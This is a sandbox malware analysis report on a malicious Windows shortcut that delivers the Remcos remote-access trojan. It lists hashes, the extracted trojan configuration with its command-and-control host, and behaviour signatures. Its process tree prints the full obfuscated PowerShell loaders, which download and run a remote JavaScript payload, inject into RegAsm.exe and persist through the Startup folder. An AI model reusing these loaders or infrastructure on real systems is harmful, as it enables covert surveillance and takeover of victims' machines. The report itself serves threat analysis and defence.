Overview

overview

10

Static

static

ACCOUNT_.lnk

windows7-x64

10

ACCOUNT_.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    29-09-2022 19:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ACCOUNT_.lnk

  • Size

    2KB

  • MD5

    3e522f13adc386d31e7cde4a557d53ff

  • SHA1

    8f1662bf897b374595b536357333c04490dcea11

  • SHA256

    58b93a208ac83f3ce577233f924ff0f10662fedc589a5c2b46733e7fd5a41b5e

  • SHA512

    05771b5443bba696e85534b45e1972268e14461fc7320a21353a0a45f3e67921c5184d8bc15889a839c8f9a8278010b34f1a76289ff3383c70fa289955dd4bfb

Score
10/10
remcosseptarat

Malware Config

Extracted

Family

remcos

Botnet

Septa

C2

topboysully.dvrlists.com:10171

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Septa-C812S4

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ACCOUNT_.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\windows\system32\cmd.exe
      "C:\windows\system32\cmd.exe" /c powers""hell/W 01 $op=''+'I'+''+'e'+'X';sal donke $op;$lgo=donke($('[En""viro""nment]::G""etEfc4s'''.Re""place('fc4','nvironment""Va""riable(''pu""blic'') + ''\\bu4b.j')));fun""ction sick""o([string]$fz, [string]$oulv){$ff=donke($('(Ntzt5""w-O""bjtzt5ct Sys""ttzt5m.""Ntzt5t.""Wtzt5bC""litzt5nt).D""ownfnvre($oul""v.Rep""lace(''ynx1'',''tp""s:/""/'').Rep""lac""e(''iyk'', ''e''), $fz)').R""epl""ace('tzt5', 'e').R""epla""ce('fnvr', 'lo""adF""il'));donke('sg6eaiarg6eai $fz'.Replace('g6eai','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));sick""o -fz ($fzf + 'Exams 2022.txt') -oulv 'htynx1transfiykr.sh/DdXp7y/tiykst.txt';sick""o -fz $lgo -oulv 'http://209.127.20.13/wokiyk.js';exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powers""hell /W 01 $op=''+'I'+''+'e'+'X';sal donke $op;$lgo=donke($('[En""viro""nment]::G""etEfc4s'''.Re""place('fc4','nvironment""Va""riable(''pu""blic'') + ''\\bu4b.j')));fun""ction sick""o([string]$fz, [string]$oulv){$ff=donke($('(Ntzt5""w-O""bjtzt5ct Sys""ttzt5m.""Ntzt5t.""Wtzt5bC""litzt5nt).D""ownfnvre($oul""v.Rep""lace(''ynx1'',''tp""s:/""/'').Rep""lac""e(''iyk'', ''e''), $fz)').R""epl""ace('tzt5', 'e').R""epla""ce('fnvr', 'lo""adF""il'));donke('sg6eaiarg6eai $fz'.Replace('g6eai','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));sick""o -fz ($fzf + 'Exams 2022.txt') -oulv 'htynx1transfiykr.sh/DdXp7y/tiykst.txt';sick""o -fz $lgo -oulv 'http://209.127.20.13/wokiyk.js';exit
        3⤵
        • Blocklisted process makes network request
        • Deletes itself
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\bu4b.js"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,55115515,55115555,55111551,55151115,55115551,55115515,55115111,55151115,55115515,55115555,55151115,55115551,55115511,55151111,51155111,51151111,51155551,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } $o00=[char]105 + 'EX';sal P $o00;([system.String]::Join('', $gf))|P } ermkflll
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:1348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Public\bu4b.js' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1088 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1772

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\tcz8fqz\imagestore.dat
    Filesize

    34KB

    MD5

    48a0cc1162c1399e55e8d5aaa4ec50a8

    SHA1

    a8426b6640d321a3f0bbce30b58c97584a08a0e0

    SHA256

    a46196d8f0f0c26c91cd6d9ad4e124d3f99a78d3c7f4a2f2084770fbae0bcd32

    SHA512

    7164fa1bf64dc0b5a70c1d9cbf02ac8cf2dc97df6cdc545c9a6b07063c506fc2952ba920df37aac247e656b30cd89cc6bedb10ba70ba1042e048adc70306d889

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FC5D3SKE.txt
    Filesize

    608B

    MD5

    42f78e06d333b7fd485fa29b51d327e3

    SHA1

    e55590c35670b569878042a3a718697df2a7a506

    SHA256

    c957a39d0fcabc6517d09ab8d84004d9dec38ad35c22d8f7621c41f7c576e0ca

    SHA512

    4bd46a42259a0555cc1de4114f09bc2106da36f716d8ba137f63428dd3d8d292262abc7935a88f5ac7efba3aa6bcdb2001bc2791dfa49e74510d27617339b428

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    1ea8e68a1077e6956b9e11be01b4e2d4

    SHA1

    e39fb86056cd4786adac8e0744233960fbc83060

    SHA256

    2a4ff0919323d03a4e4aa237ffe698ebd13fc582c5ba610e64e0bfcf5cc3bc0f

    SHA512

    c37e825b30150bade81b7d5158e64e3325c6a01b3b8da8b89d6d69e7516796ef0cb3255f07a66e9e3f536b060b46d0de4f5f82d75e293bb0bebae3effd012056

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    1ea8e68a1077e6956b9e11be01b4e2d4

    SHA1

    e39fb86056cd4786adac8e0744233960fbc83060

    SHA256

    2a4ff0919323d03a4e4aa237ffe698ebd13fc582c5ba610e64e0bfcf5cc3bc0f

    SHA512

    c37e825b30150bade81b7d5158e64e3325c6a01b3b8da8b89d6d69e7516796ef0cb3255f07a66e9e3f536b060b46d0de4f5f82d75e293bb0bebae3effd012056

    Download Submit

  • C:\Users\Public\bu4b.js
    Filesize

    1KB

    MD5

    ddbddd6eeba7f34b9ea034e7cb677d56

    SHA1

    5219a2217f67d0777d8846669f05faf063b58174

    SHA256

    37a6b17e9660a3db4693282a0b132bc6966fc8d48898f07715cf20aaaa244c2f

    SHA512

    41ea97d1bcefc207faa536bbbe56d14b54989bdcb43d71b76167803921f26e5e9d5909697b84e2df606f454e7f87c5398dc7f01899fe26494cc4a0916b06380f

    Download Submit

  • \Users\Admin\AppData\Local\Temp\73ab9a28-0688-49e7-b77d-eacdd07237df\AgileDotNetRT64.dll
    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    Download Submit

  • memory/1052-119-0x000000000265B000-0x000000000267A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1052-118-0x0000000002654000-0x0000000002657000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1052-113-0x000007FEF3BE0000-0x000007FEF4603000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/1052-120-0x0000000002654000-0x0000000002657000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1052-106-0x0000000000000000-mapping.dmp

    Download

  • memory/1052-114-0x000007FEF3080000-0x000007FEF3BDD000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1052-122-0x000000000265B000-0x000000000267A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1052-116-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1300-96-0x0000000002374000-0x0000000002377000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1300-101-0x000000000237B000-0x000000000239A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1300-100-0x0000000002374000-0x0000000002377000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1300-97-0x000000000237B000-0x000000000239A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1300-95-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1300-94-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/1300-90-0x0000000000000000-mapping.dmp

    Download

  • memory/1316-88-0x0000000000000000-mapping.dmp

    Download

  • memory/1348-131-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-138-0x00000000004327A4-mapping.dmp

    Download

  • memory/1348-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-142-0x0000000075601000-0x0000000075603000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1348-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1348-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

    Download

  • memory/1584-102-0x0000000001C30000-0x0000000001C40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1584-98-0x0000000000000000-mapping.dmp

    Download

  • memory/1688-54-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2040-124-0x000007FEF26E0000-0x000007FEF2864000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2040-115-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/2040-104-0x0000000000000000-mapping.dmp

    Download

  • memory/2040-140-0x0000000002734000-0x0000000002737000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2040-110-0x000007FEF3BE0000-0x000007FEF4603000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/2040-141-0x000000000273B000-0x000000000275A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/2040-121-0x000000000273B000-0x000000000275A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/2040-112-0x000007FEF3080000-0x000007FEF3BDD000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/2040-117-0x0000000002734000-0x0000000002737000-memory.dmp

    Filesize

    12KB

    Download